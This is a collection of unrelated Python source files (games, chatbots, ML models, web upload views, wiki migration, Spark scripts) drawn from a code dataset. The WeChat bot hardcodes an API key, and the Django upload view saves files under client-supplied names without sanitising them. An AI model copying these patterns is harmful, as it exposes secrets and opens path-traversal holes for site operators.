events\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit(0)\n        elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n            sys.exit(0)\n\n    #Ticking\n    dt = clock.tick()\n    print(dt)\n\n    #Checking input\n    keys = pygame.key.get_pressed()\n    if keys [pygame.K_d]:\n        box.x +=1\n    if keys [pygame.K_s]:\n        box.y += 1\n    if keys [pygame.K_w]:\n        box.y -= 1\n    if keys[pygame.K_a]:\n        box.x -= 1\n\n    #Drawing\n    screen.fill((0,0,0))\n    pygame.draw.rect(screen, (0,150,255),box)\n    pygame.display.flip()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"433174374","text":"# -*- coding: UTF-8 -*-\r\nimport requests\r\nimport itchat\r\nimport json\r\nfrom itchat.content import *\r\nimport os\r\nfrom pydub import AudioSegment\r\nfrom kedaxunfei import xfstt\r\nimport io\r\nimport wave\r\n\r\ndef get_response_tuling(msg):\r\n    # Here, just as in \"3. 
Implementing the simplest interaction with the Tuling robot\",\r\n    # we build the data that gets sent to the server\r\n    apiUrl = 'http://www.tuling123.com/openapi/api'\r\n    data = {\r\n        'key' : '3c4f1aa741314038a324f424634c19bd',\r\n        'info' : msg,\r\n        'userid' : 'wechat-robot',\r\n    }\r\n    try:\r\n        r = requests.post(apiUrl, data=data).json()\r\n        # dict.get() returns None instead of raising when there is no 'text' key\r\n        return r.get('text')\r\n    # the try-except keeps the program from crashing when the server does not respond properly\r\n    # if the server cannot interact normally (non-JSON reply or no connection), we fall into the return below\r\n    except:\r\n        # this returns None\r\n        return\r\n\r\ndef asr(msg):\r\n    # recognize a voice message and return it as text\r\n    msg['Text'](msg['FileName'])\r\n    path = str(msg['FileName'])\r\n    print(path)\r\n    # first read the local mp3 as a byte string to use as the data sample\r\n    fp=open(path,'rb')\r\n    data=fp.read()\r\n    fp.close()\r\n    # main part\r\n    aud=io.BytesIO(data)\r\n    AudioSegment.converter = r\"F:\\\\ffmpeg-20190422-eeca67e-win64-static\\\\ffmpeg-20190422-eeca67e-win64-static\\\\bin\\\\ffmpeg.exe\"\r\n    sound=AudioSegment.from_file(aud,format='mp3')\r\n    raw_data = sound._data\r\n    # write to a file to verify that the result is correct\r\n    l=len(raw_data)\r\n    f=wave.open(\"tmp.wav\",'wb')\r\n    f.setnchannels(1)\r\n    f.setsampwidth(2)\r\n    f.setframerate(16000)\r\n    f.setnframes(l)\r\n    f.writeframes(raw_data)\r\n    f.close()\r\n    os.remove(msg['FileName'])\r\n    return xfstt('tmp.wav')\r\n\r\n@itchat.msg_register(TEXT)  # TEXT is available because itchat.content was fully imported above\r\ndef tuling_reply_text(msg):\r\n    # handler registered for incoming text messages\r\n    # set a default reply so we can still answer when the Tuling key has a problem\r\n    defaultReply = 'I received a: ' + msg['Text']\r\n    return get_response_tuling(msg['Text']) or defaultReply\r\n\r\n@itchat.msg_register(RECORDING)\r\ndef tuling_reply(msg):\r\n    # handler registered for incoming voice messages\r\n    # set a default reply so we can still answer when the Tuling key has a problem\r\n    defaultReply = 'I received a: ' + msg['Type']\r\n\r\n    # if the Tuling key has a problem, the reply will be None\r\n    # print(msg)\r\n    asrMessage = asr(msg)\r\n    return get_response_tuling(asrMessage) or defaultReply\r\n    # return defaultReply\r\n\r\n# to make experimenting easier (no need to rescan the QR code after every change) we use hot reload with hotReload=True\r\nitchat.auto_login(hotReload=True,enableCmdQR=2)\r\nitchat.run()","sub_path":"retrieval/scripts/stt.py","file_name":"stt.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"365530253","text":"from lda2vec import utils, b_model\nimport numpy as np\nimport os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\n# Path to preprocessed data\ndata_path = \"data/clean_data\"\n# Whether or not to load saved embeddings file\nload_embeds = True\n\n# Load data from files\n(idx_to_word, word_to_idx, freqs, pivot_ids, target_ids, doc_ids, embed_matrix, bias_idxes) = utils.load_preprocessed_data(\n    data_path, load_embed_matrix=load_embeds, load_bias_idxes=True)\n\nbias_words = ['privacy', 'anonymity','confidentiality','disclosure']\nbias_idxes = [word_to_idx[word] for word in bias_words]\n\n# Number of unique documents\nnum_docs = len(np.unique(doc_ids))\n# Number of unique words in vocabulary (int)\nvocab_size = embed_matrix.shape[0] \n# Embed layer dimension size\n# If not loading embeds, change 128 to whatever size you want.\nembed_size = embed_matrix.shape[1] if load_embeds else 128\n# Number of topics to cluster into\nnum_topics = 20\n# Number of topics to bias\nnum_bias_topics = 5\n# How strongly we bias the topics\nbias_lambda = 1e-2\n# Factor that determines how much bias topics have to be close to all bias terms\n# 0 is uniform focus, 100+ is hard specialization\nbias_unity = 20.0\n\ntarget_bias_topic_cov=0.8\n# Epoch that we want to \"switch on\" LDA loss\nswitch_loss_epoch = 5\n# Pretrained 
embeddings\npretrained_embeddings = embed_matrix if load_embeds else None\n# If True, save logdir, otherwise don't\nsave_graph = True\nnum_epochs = 200\nbatch_size = 512 #4096\nlmbda = 1e-4\nlogdir = \"bias_experiment\"\n\n# Initialize the model\nm = b_model(num_docs,\n vocab_size,\n num_topics,\n bias_idxes,\n bias_topics=num_bias_topics,\n bias_lmbda=bias_lambda,\n bias_unity=bias_unity,\n target_bias_topic_cov=0.8,\n embedding_size=embed_size,\n pretrained_embeddings=pretrained_embeddings,\n freqs=freqs,\n batch_size = batch_size,\n save_graph_def=save_graph,\n logdir=logdir)\n\n# Train the model\nm.train(pivot_ids,\n target_ids,\n doc_ids,\n len(pivot_ids),\n num_epochs,\n idx_to_word=idx_to_word,\n switch_loss_epoch=switch_loss_epoch)\n\n# Visualize topics with pyldavis\nutils.generate_ldavis_data(data_path, m, idx_to_word, freqs, vocab_size)","sub_path":"tests/nela/run_nela_b.py","file_name":"run_nela_b.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"274348548","text":"import tensorflow as tf\nfrom image_segmentation.VggBlock import VggBlock\n\n\"\"\"\nSo if you're wondering, \"should I use the Layer class or the Model class?\", ask yourself: will I need to call fit() on it?\nWill I need to call save() on it? If so, go with Model. If not (either because your class is just a block in a bigger \nsystem, or because you are writing training & saving code yourself), use Layer.\n\nIn general like this example: https://www.tensorflow.org/guide/keras/custom_layers_and_models#the_model_class\nthe Decoder and Encoder must be defined as subclass Layer, but cause I gonna load the pre-trained weights for VGG16\nI have to define as subclass model\n\"\"\"\n\n\nclass Encoder(tf.keras.Model):\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv_blk_5 = None\n self.conv_blk_4 = None\n self.conv_blk_3 = None\n self.conv_blk_2 = None\n self.conv_blk_1 = None\n\n def build(self, input_shape):\n self.conv_blk_1 = VggBlock(layers=2, filters=64, kernel_size=3, name=\"enc_conv_blk_1\")\n self.conv_blk_2 = VggBlock(layers=2, filters=128, kernel_size=3, name=\"enc_conv_blk_2\")\n self.conv_blk_3 = VggBlock(layers=3, filters=256, kernel_size=3, name=\"enc_conv_blk_3\")\n self.conv_blk_4 = VggBlock(layers=3, filters=512, kernel_size=3, name=\"enc_conv_blk_4\")\n self.conv_blk_5 = VggBlock(layers=3, filters=512, kernel_size=3, name=\"enc_conv_blk_5\")\n\n def call(self, inputs):\n x = self.conv_blk_1(inputs)\n blk_1_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_1\")(x)\n\n x = self.conv_blk_2(x)\n blk_2_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_2\")(x)\n\n x = self.conv_blk_3(x)\n blk_3_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_3\")(x)\n\n x = self.conv_blk_4(x)\n blk_4_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_4\")(x)\n\n x = self.conv_blk_5(x)\n blk_5_out = x\n x = tf.keras.layers.MaxPooling2D((2, 2), strides=2, name=\"max_pool_5\")(x)\n\n return blk_1_out, blk_2_out, blk_3_out, blk_4_out, blk_5_out, x\n","sub_path":"image_segmentation/image_segmentation/Encoder.py","file_name":"Encoder.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"206170360","text":"import dash_bootstrap_components as dbc\nimport dash_html_components as html\nimport dash_core_components as 
dcc\n\n\nupload_data = dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Перетащите сюда файл или - ',\n dbc.Button(\"Выберете его из папки\", className=\"mr-1\")\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n # Allow multiple files to be uploaded\n multiple=True\n)\n\n\nuploaded_data = dcc.Loading(\n html.Div(id='output-data-upload')\n)\n\n\ntab_upload_content = dbc.Card(\n dbc.CardBody(\n [\n dbc.Row(dbc.Col(upload_data)),\n dbc.Row(dbc.Col(dbc.Card(dbc.CardBody(uploaded_data))))\n ]\n ),\n className=\"mt-3\",\n)\n\n\n","sub_path":"SKE/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"645043263","text":"\n\n#calss header\nclass _PLOT():\n\tdef __init__(self,): \n\t\tself.name = \"PLOT\"\n\t\tself.definitions = [u'the story of a book, film, play, etc.: ', u'a secret plan made by several people to do something that is wrong, harmful, or not legal, especially to do damage to a person or a government: ', u'a small piece of land that has been marked or measured for a particular purpose: ', u'a diagram or chart']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_plot.py","file_name":"_plot.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"172908636","text":"'''\nCreated on Jan 23, 2013\n\n@author: jcm\n'''\n\nfrom ..analyzers import MetricSpaceAnalyzerFactory\nfrom ..detectors import IVTermDetectorBasicFactory\nfrom preprocessing import BasicDocumentPreprocessor\nfrom cand_gen import CandidateGenerator\n\nimport logging\n\n\nclass LexicalNormalizer(object):\n cname = __name__ + '.LexicalNormalizer'\n def __init__(self,vocabulary_set):\n # instance oov detector\n self.detector = IVTermDetectorBasicFactory.create_detector(vocabulary_set)\n \n \n # instance analyzers and push them to the candidate generator\n cand_generator = CandidateGenerator() \n for resource in vocabulary_set: \n cand_generator.add_analyzer(\"metric-space\", MetricSpaceAnalyzerFactory.create_analyzer(resource))\n \n self.cand_generator = cand_generator\n \n # instance preprocessor and logger\n self.preprocessor = BasicDocumentPreprocessor()\n self.logger = logging.getLogger(LexicalNormalizer.cname) \n \n def _generate_alternatives(self, doc_items):\n norm_items = []\n for item in doc_items:\n if self.detector.detect_term(item):\n norm_items.append(item)\n else:\n norm_items.append(self.cand_generator.generate_candidates(item))\n \n return norm_items\n \n \n def normalize_document(self, doc):\n proc_document = self.preprocessor.process(doc)\n item_alternatives = self._generate_alternatives(proc_document)\n return item_alternatives \n","sub_path":"lsnorm/core/normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"373599801","text":"#选择排序\nimport random\n\ndef SortTest(List):\n min_index=0 \n for i in range(len(List) - 1):\n # 将起始元素设为最小元素\n min_index = i\n # 第二层for表示最小元素和后面的元素逐个比较\n for j in range(i + 1, 
len(List)):\n if List[min_index]>List[j]:\n # 如果当前元素比最小元素小,则把当前元素角标记为最小元素角标\n min_index = j\n # 查找一遍后将最小元素与起始元素互换\n num1=List[i]\n List[i]=List[min_index]\n List[min_index]=num1\n return List\n\nif __name__==\"__main__\":\n TestList=[]\n for i in range(10):\n rannum=random.randint(0,100)\n TestList.append(rannum)\n List=SortTest(TestList)\n print(List)","sub_path":"SortTest/SortTest2.py","file_name":"SortTest2.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"342858743","text":"import re\nimport time\nimport pandoc\n\nfrom mediawiki import mediawiki\nfrom gql import gql, Client\nfrom gql.transport.requests import RequestsHTTPTransport\n\n# ============ Wiki.js Client stuff\ntoken = \"\"\nsample_transport=RequestsHTTPTransport(\n url=\"\",\n use_json=True,\n headers={\n \"Authorization\": token,\n \"Content-type\": \"application/json\",\n },\n verify=False,\n retries=5\n)\n\nclient = Client(\n transport=sample_transport,\n fetch_schema_from_transport=True,\n)\n# ============\n\nurl=\"\"\n\nc = mediawiki.MWClient(\n url=url, \n user=\"\", \n password=\"\"\n)\n\ndef continue_str(data):\n try:\n return data[\"continue\"][\"apcontinue\"]\n except KeyError as error:\n pass\n\ndef get_ap():\n apcontinue = \"\"\n full_aplist = []\n counter = 1\n while apcontinue is not None:\n print(f\"Counter: {counter}\")\n print(type(apcontinue))\n apdata = c.allpages(apcontinue=apcontinue).json()\n apcontinue = continue_str(apdata)\n print(type(apcontinue))\n print(\"hello there\")\n aplist = apdata[\"query\"][\"allpages\"]\n print(len(aplist))\n full_aplist = [*full_aplist, *aplist]\n print(f\"full_aplist item count: {len(full_aplist)}\")\n counter += 1\n print(apcontinue)\n\n return full_aplist\n\ndef scrub_title(title):\n title = re.sub(r\"[^\\w\\s]\", '', title)\n title = re.sub(r\"\\s+\", '-', title)\n\n return title\n\nap = get_ap()\nlimit = 5\nfor n in range(limit):\n try:\n for page in ap:\n pageid = page[\"pageid\"]\n print(pageid)\n title = page[\"title\"]\n url_title = scrub_title(title)\n wikijs_path = f\"/import/{url_title}\"\n contents = c.page_contents(pageid=pageid).json()\n wikitext = contents[\"parse\"][\"wikitext\"][\"*\"]\n #print(f\"[DEBUG] >> {wikitext}\")\n read_wikitext = pandoc.read(wikitext, format=\"mediawiki\")\n md_wikitext = pandoc.write(read_wikitext, format=\"markdown\")\n\n query = gql(fr'''\n mutation PageMutation($content: String!, $path: String!, $title: String!) {{\n pages {{\n create(\n content: $content,\n description: \"transfernetic - Mediawiki Import\",\n editor: \"markdown\",\n isPublished: true,\n isPrivate: false,\n locale: \"en\",\n path: $path,\n publishEndDate: \"\",\n publishStartDate: \"\",\n tags: [\"import\"],\n title: $title\n ) {{\n page {{\n id\n }}\n }}\n }}\n }}''')\n print(f\"Added page {title} at {wikijs_path}\")\n results = client.execute(query, variable_values={\"content\": str(md_wikitext), \"path\": str(wikijs_path), \"title\": str(title)})\n time.sleep(5)\n except Exception as e:\n print(f\"Error: {e}\")\n continue","sub_path":"transfernetic.py","file_name":"transfernetic.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"74589979","text":"#!/usr/local/bin/python\n''' A basic Python script to search for a file and then removes it. 
A good use case scenario is if a computer has excess log files filling up a mounted Volume.\n'''\n\nimport os\n\n# Change variable name as needed\nVAR1 = \"/PATH/TO/FILE\"\n\nif os.path.exists(VAR1):\n    os.remove(VAR1)  # os.remove() deletes a file; os.rmdir() only removes an empty directory\n    print(\"Files removed successfully\")\nelse:\n    print(\"Nothing to remove: \" + VAR1 + \" does not exist\")\n","sub_path":"file_removal.py","file_name":"file_removal.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"7411336","text":"\"\"\"\n    Deep Anomaly Detection Using Geometric Transformation.\n\"\"\"\nfrom __future__ import division\nimport os\nimport time\nimport math\nfrom glob import glob\nimport tensorflow as tf\nimport numpy as np\nfrom six.moves import xrange\n\nimport sys\nsys.path.append(os.path.abspath('..'))\n\nfrom utils.ops import *\nfrom utils.utils import *\nfrom utils.data import *\nfrom .model import NET\n\n\n###\nfrom functools import reduce\n###\n\n\nclass DADUGT(NET):\n    def __init__(self, sess, config, dataset=None, lamb = 50.):\n        super(DADUGT, self).__init__(sess,\n                                     dataset,\n                                     config,\n                                     'dadugt',\n                                     'DADUGT-model')\n\n        self.y_dim = geometric_transformation_classes()\n        self.net_dim = self.default_dim\n        self.build_model()\n\n    def build_model(self):\n        self.y = tf.placeholder(tf.float32, [None, self.y_dim], name='self_label')\n\n        #Construct Generator, Discriminators and Encoders\n        self.scores, self.logit = self.classifier(self.inputs)\n\n\n        # Update Discriminator\n        self.loss = tf.reduce_mean(\n            softmax_cross_entropy_with_logits(self.logit, self.y))\n\n        # summary op.\n        t_vars = tf.trainable_variables()\n\n        # variables for each networks.\n        self.c_vars = [var for var in t_vars if 'c_' in var.name]\n\n        # Optimization Setting\n        self.optim = tf.train.AdamOptimizer(self.c_lr, beta1=self.beta1) \\\n            .minimize(self.loss, var_list=self.c_vars)\n\n        self.saver = tf.train.Saver()\n\n\n    def train(self, config):\n\n\n\n        # summary_op: merge summary\n        # self.c_sum = merge_summary([self.score_sum, self.loss_sum])\n\n        # Create Tensorboard\n        # self.writer = SummaryWriter(os.path.join(\"./logs/DADUGT\", self.model_dir), self.sess.graph)\n\n        # Setting variable for debug\n        counter = 1\n        start_time = time.time()\n        could_load, checkpoint_counter, checkpoint_epoch = self.load(self.checkpoint_dir, config.epoch)\n        if could_load:\n            counter = checkpoint_counter\n            print(\" [*] Load SUCCESS\")\n            if checkpoint_epoch == config.epoch and config.epoch > 0:\n                print(\" [*] Train is already done with given epoch.\")\n                return\n        else:\n            print(\" [!] 
Load failed...\")\n\n\n batch_idxs = self.dataset.ntrain_batch(config.batch_size)\n\n for epoch in xrange(checkpoint_epoch, config.epoch):\n for idx in xrange(batch_idxs):\n\n #Prepare batch data for learning\n if self.dataset and not self.dataset.transformed:\n batch_images = self.data_X[idx*config.batch_size:(idx+1)*config.batch_size]\n batch_x, batch_y = geometric_transformation(batch_images)\n elif not self.dataset :\n batch_files = self.data[idx*config.batch_size:(idx+1)*config.batch_size]\n batch = [ get_image(batch_file, input_height=self.input_height, input_width=self.input_width,\n resize_height=self.output_height, resize_width=self.output_width,\n crop=self.crop, grayscale=self.grayscale) for batch_file in batch_files]\n if self.grayscale:\n batch_images = np.array(batch).astype(np.float32)[:, :, :, None]\n else:\n batch_images = np.array(batch).astype(np.float32)\n batch_x, batch_y = geometric_transformation(batch_images)\n elif self.dataset and self.dataset.transformed:\n batch_x, batch_y = self.dataset.next_batch(self.batch_size)\n #Make feed dictionary\n feed_dict = {self.inputs: batch_x, self.y:batch_y, self.is_train:True}\n #Run Optimization and Summary Operation\n try:\n self.sess.run(self.optim, feed_dict = feed_dict)\n except:\n continue\n\n counter += 1\n\n if config.verbose:\n if np.mod(counter, config.print_interval) == 0:\n err = self.sess.run(self.loss, feed_dict = feed_dict)\n print(\"Epoch: [%2d] [%4d/%4d] time: %4.4f, loss: %.8f\" \\\n % (epoch, idx, batch_idxs, time.time() - start_time, err))\n\n if np.mod(epoch+1, config.epoch_save_interval) == 0:\n self.save(config.checkpoint_dir, counter, epoch+1)\n self.save(config.checkpoint_dir, counter, epoch+1)\n print(\" [!] Training is Done...\")\n\n def classifier(self, image, reuse=False):\n with tf.variable_scope(\"classifier\") as scope:\n if reuse:\n scope.reuse_variables()\n else:\n self.bn1 = batch_norm(self.is_train, name='c_bn1')\n self.bn2 = batch_norm(self.is_train, name='c_bn2')\n self.bn3 = batch_norm(self.is_train, name='c_bn3')\n if self.data_type =='image':\n if self.dataset_name == \"mnist\":\n h0 = leak_relu(conv2d(image, int(self.net_dim/2), st=1, name='c_h0_conv'))\n h1 = leak_relu(self.bn1(conv2d(h0, self.net_dim, name='c_h1_conv')))\n h2 = leak_relu(self.bn2(conv2d(h1, self.net_dim*2, name='c_h2_conv')))\n h3 = linear(h2, self.y_dim, 'c_h3_lin')\n return tf.nn.softmax(h3), h3\n\n else:\n h0 = leak_relu(conv2d(image, int(self.net_dim/2), name='c_h0_conv'))\n h1 = leak_relu(self.bn1(conv2d(h0, self.net_dim, name='c_h1_conv')))\n h2 = leak_relu(self.bn2(conv2d(h1, self.net_dim*2, name='c_h2_conv')))\n h3 = leak_relu(self.bn3(conv2d(h2, self.net_dim*4, name='c_h3_conv')))\n h4 = linear(h3, self.y_dim, 'c_h4_lin')\n return tf.nn.softmax(h4), h4\n else:\n assert False\n\n def get_test_data(self):\n\n if self.dataset is not None:\n self.test_data_names = ['{}_test_data_{:05}'.format(self.dataset_name, i)\n for i in range(len(self.test_y))]\n self.test_data = self.test_x\n else:\n self.test_data_names = glob(self.test_dir+'/*.*')\n batch = [get_image(name, input_height=self.input_height, input_width = self.input_width,\n resize_height = self.output_height, resize_width = self.output_width,\n crop = self.crop, grayscale=self.grayscale) for name in self.test_data_names]\n if self.grayscale:\n batch_images = np.array(batch).astype(np.float32)[:,:,:,None]\n else:\n batch_images = np.array(batch).astype(np.float32)\n #print np.shape(batch_images)\n self.test_data = batch_images\n print (\"[*] test data for 
anomaly detection is loaded\")\n\n\n def build_anomaly_detector(self):\n self.get_test_data()\n if self.data_type == 'image':\n self.test_inputs = tf.placeholder(tf.float32, [None] + self.image_dims, name='test_images')\n\n self.test_labels = tf.placeholder(tf.float32, [None, self.y_dim], name='test_labels')\n\n self.test_score, self.test_logits = self.classifier(self.test_inputs, reuse=True)\n self.anomal_score = - tf.reduce_sum(tf.multiply(self.test_labels, self.test_score))\n return self.model_dir, ['anomaly_score']\n\n def anomaly_detector(self, test_data, test_data_name, config):\n\n if self.dataset:\n y_i = int(test_data_name.split('_')[-1])\n is_anomal = self.test_y[y_i] in self.excluded\n if self.data_type == 'image':\n test_data_name = test_data_name+'.jpg'\n\n test_geo_data, test_geo_label = geometric_transformation(test_data)\n\n feed_dict = {self.test_inputs : test_geo_data,\n self.test_labels: test_geo_label,\n self.is_train:False}\n anomal_score = self.sess.run(self.anomal_score, feed_dict = feed_dict)\n if config.verbose:\n if self.dataset:\n print(\"[{:05d}]th sample Label: [{}:{}] anomaly score(enc_loss): {:.8f}\"\\\n .format(y_i, self.test_y[y_i], is_anomal, anomal_score))\n else:\n print(\"anomaly score: {:.8f} :by feature matching, {:.8f}:by cross-entropy\"\\\n .format(ano_feature, ano_cross))\n\n return [anomal_score], is_anomal\n @property\n def model_dir(self):\n if self.excluded and self.dataset:\n return \"{}_{}{}_{}_{}{}_{}\".format(\n self.dataset_name,self.balancing, self.batch_size, self.output_height, self.output_width,self.variance, tuple(self.excluded))\n else:\n return \"{}_{}{}_{}{}_{}\".format(\n self.dataset_name,self.balancing,self.batch_size, self.output_height, self.output_width,self.variance)\n","sub_path":"models/dadugt.py","file_name":"dadugt.py","file_ext":"py","file_size_in_byte":8231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"556412086","text":"from games.roulette import roulette\n\nclass report_generator():\n\n loggingEnabled = True;\n\n @staticmethod\n def log_game(roll_number):\n if report_generator.loggingEnabled == True:\n print(\"game: \"+ str(roll_number))\n\n @staticmethod\n def log_result(result):\n print(\"\")\n print(\"result: \"+str(result))\n\n @staticmethod\n def log_player_account_change(account_delta, account):\n print(\"account changed of: \" + str(account_delta))\n print(\"account new amount: \" + str(account))\n\n @staticmethod\n def log_player_bet_change(new_bet):\n if report_generator.loggingEnabled == True:\n for bet_type, bet_dict in new_bet.iteritems():\n print(\"bet type: \"+bet_type),\n for bet_target, bet_amount in bet_dict.iteritems():\n if type(bet_target) == str:\n print(bet_target+\": \"+str(bet_amount)),\n elif type(bet_target) == int:\n print(str(bet_target)+ \": \"+str(bet_amount)),\n print(\"\")\n print(\"bet multiplier: \" + str(roulette.get_multiplier(bet_type)))\n\n\n def log_multiplier(multiplier):\n print(\"multiplier: \"+multiplier)\n\n def log_profit(profit):\n print(\"profit: \"+profit)\n\n\n\n def printReport(self):\n for key, value in self.rolls.iteritems():\n for key2, value2, in value:\n print(\"roll: \"+key2, \"result: \"+value2[\"result\"], \"multiplier \"+value2[\"multiplier\"],\n \"profit: \"+value2[\"profit\"], \"player_account: 
\"+value2[\"player_account\"])","sub_path":"reports/report_generator.py","file_name":"report_generator.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"482750044","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .form import UploadFileForm\nfrom django.views.generic import View\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom django.conf import settings\n\nimport logging\n\n# Create your views here.\n\n\nclass FileUploadView(View):\n form_class = UploadFileForm\n #success_url = reverse_lazy('home')\n template_name = 'upload.html'\n\n def get(self, request, *args, **kwargs):\n form = self.form_class()\n return render(request, 'upload.html', {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST, request.FILES)\n\n if form.is_valid():\n form.save()\n\n return self.handle_uploaded_file(request.FILES['filename'])\n\n else:\n logging.error(form.errors)\n return self.return_fmessage()\n\n def return_smessage(self, filepath):\n output = \"\"\"\n \n \n \n \n \n Success upload to
{path}\n \n \n \"\"\".format(path=filepath)\n\n return HttpResponse(output)\n\n def return_fmessage(self, name=''):\n output = \"\"\"\n \n \n \n \n \n\n

Invalid
{name1}

\n\n \n \n \"\"\".format(name1=name)\n\n return HttpResponse(output)\n\n def handle_uploaded_file(self, file):\n\n filepath = settings.MEDIA_ROOT\n filename = file.name\n\n filefullpath = filepath + filename\n\n with open(filefullpath, 'wb+') as destination:\n for chunk in file.chunks():\n destination.write(chunk)\n\n return self.return_smessage(filefullpath)\n","sub_path":"mysite/uploadfiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"245096852","text":"import pyspark\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import substring\nfrom operator import add\nimport matplotlib.pyplot as plt\n\n\"\"\"\n A simple script exploring examples of different spark partitioners on structure of resulting partitions.\n\n To execute, on a Windows machine with standalone spark:\n\n spark-submit.cmd --master local[2] spark_test.py\n\n (if in a cluster w/ yarn or mesos, change master and other cmd-line params as desired)\n\"\"\"\n\nsmallCsvFile = \"example.csv\"\nlargeCsvFile = \"bigExample.csv\"\nSMALL_NUM_REPARTITIONS = 4 # Choose how many partitions to use in each repartitioning strategy for small examples.\nLARGE_NUM_REPARTITIONS = 100 # Choose how many partitions to use in each repartitioning strategy for large examples.\n\ndef quiet_logs(sc):\n logger = sc._jvm.org.apache.log4j\n logger.LogManager.getLogger(\"org\"). setLevel( logger.Level.ERROR )\n logger.LogManager.getLogger(\"akka\").setLevel( logger.Level.ERROR )\n\ndef smallRddExample(sc):\n assert True == False, \"Thou shallt not pass. ('cuz this an't implemented yet)\"\n\ndef largeRddExample(sc):\n assert True == False, \"Thou shallt not pass. ('cuz this an't implemented yet)\"\n\n#def makeBarChart():\n\ndef countDistinctGeocodes(partition, geocodeLen=6):\n distinctGeocodes = set([])\n for record in partition:\n geocode = record[0][:geocodeLen]\n distinctGeocodes.add(geocode)\n return len(distinctGeocodes)\n\ndef listOfGeocodes(partition, geocodeLen=6):\n distinctGeocodes = set([])\n for record in partition:\n geocode = record[0][:geocodeLen]\n distinctGeocodes.add(geocode)\n return distinctGeocodes\n\ndef getAndPrintRddStatistics(df, mode=\"small\"):\n rdd = df.rdd.glom() # Convert rdd to partitions equivalent\n\n # If small example, explicitly display rdd partitions in STDOUT\n if mode == \"small\":\n print(f\"The df.rdd contains {rdd.getNumPartitions()} partitions:\")\n for partition in rdd.collect():\n print(partition)\n\n # How many partitions were there in total?\n numPartitions = rdd.getNumPartitions()\n print(f\"Found {numPartitions} partitions in rdd\")\n\n # Of those, how many partitions were empty?\n numEmpty = rdd.map(lambda partition: 1 if len(partition) == 0 else 0).reduce(add)\n print(f\"Of those, {numEmpty} were empty\")\n\n # What was the distribution of partition sizes?\n sizes = rdd.map(lambda partition: (len(partition), 1) ).reduceByKey(add).collect()\n print(\"distribution of partition sizes:\")\n print(sizes)\n\n lengths = [6,7,11] if mode == \"large\" else [1,2,3]\n # For each geolevel, how many distinct tract, county, block codes were there in total?\n tracts = rdd.map(lambda partition: listOfGeocodes(partition, lengths[0])).reduce(set.union)#.map(lambda setOfGeocodes: len(setOfGeocodes)).collect()\n print(f\"number of tracts in total: {len(tracts)}\")\n blockgroups = rdd.map(lambda partition: listOfGeocodes(partition, lengths[1])).reduce(set.union)#.map(lambda 
